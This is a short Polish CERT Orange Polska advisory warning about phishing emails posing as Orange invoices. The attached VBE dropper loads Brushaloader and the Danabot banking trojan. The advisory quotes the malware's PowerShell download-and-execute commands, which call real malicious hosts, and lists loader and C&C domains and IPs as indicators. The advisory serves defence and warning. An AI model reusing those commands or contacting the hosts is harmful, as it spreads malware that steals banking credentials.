hamburger

(jeśli zgłaszasz przypadek phishingu, zapisz mail (przesuń go z programu pocztowego na pulpit komputera lub wybierz opcję plik/zapisz jako), a następnie załącz)

Podejrzany SMS prześlij na nr 508 700 900

Jeśli zgłoszenie dotyczy bezpieczeństwa dzieci, zgłoś je również pod http://www.dyzurnet.pl
@CERT_OPL

Uwaga na „niby-faktury” od Orange

Do CERT Orange Polska trafiło kilka maili, mogących zapowiadać kolejną kampanię „na fakturę od Orange”. O ile z jednej strony teraz nawet nieprawne oko dojrzy, że treść wiadomości nie ma nic wspólnego z naszymi fakturami, i tak:

po pierwsze – warto ostrzec
po drugie – następnym razem przestępcy mogą się bardziej postarać

Jak można się spodziewać, w załączonym dokumencie znajduje się dropper złośliwego oprogramowania. Przynajmniej teoretycznie, bowiem nasze testy wykazały, że nie wiedzieć czemu, łączy się z chmurowymi usługami Google. Pamiętajmy jednak, że jeśli coś nie udało się za pierwszym razem, nie musi to oznaczać, że uda się również za drugim.

Warto uważać.

Uzupełnienie 02.07:

Niewiele czasu zajęło przestępcom zorientowanie się, że coś jest nie tak. W dzisiejszych próbkach zawarty w archiwum plik dokument_91397.vbe instalując najpierw Brushaloader, a docelowo bankera Danabot. Sekcja inicjująca pobranie malware’u wygląda jak poniżej:

IEX (New-Object Net.WebClient).DownloadString(’hxxps://statusnim.info:443/chkesosod/downs/ipkHKmN’);
$path = '/index.php?id=download’; $hostname = 'derikaosos.info’; IEX(New-Object Net.Webclient).downloadstring(’https://’ + $hostname + $path);

Oczywiście komunikacja z malware w sieci Orange Polska blokowana jest przez CyberTarczę.

IoC

Brushaloader:
derikaosos.info:443
47.91.90.36
hxxps://varnecoposlo.info
carnellosa.info
tatmandopolos.info

C&C
149.28.180.182
192.71.249.51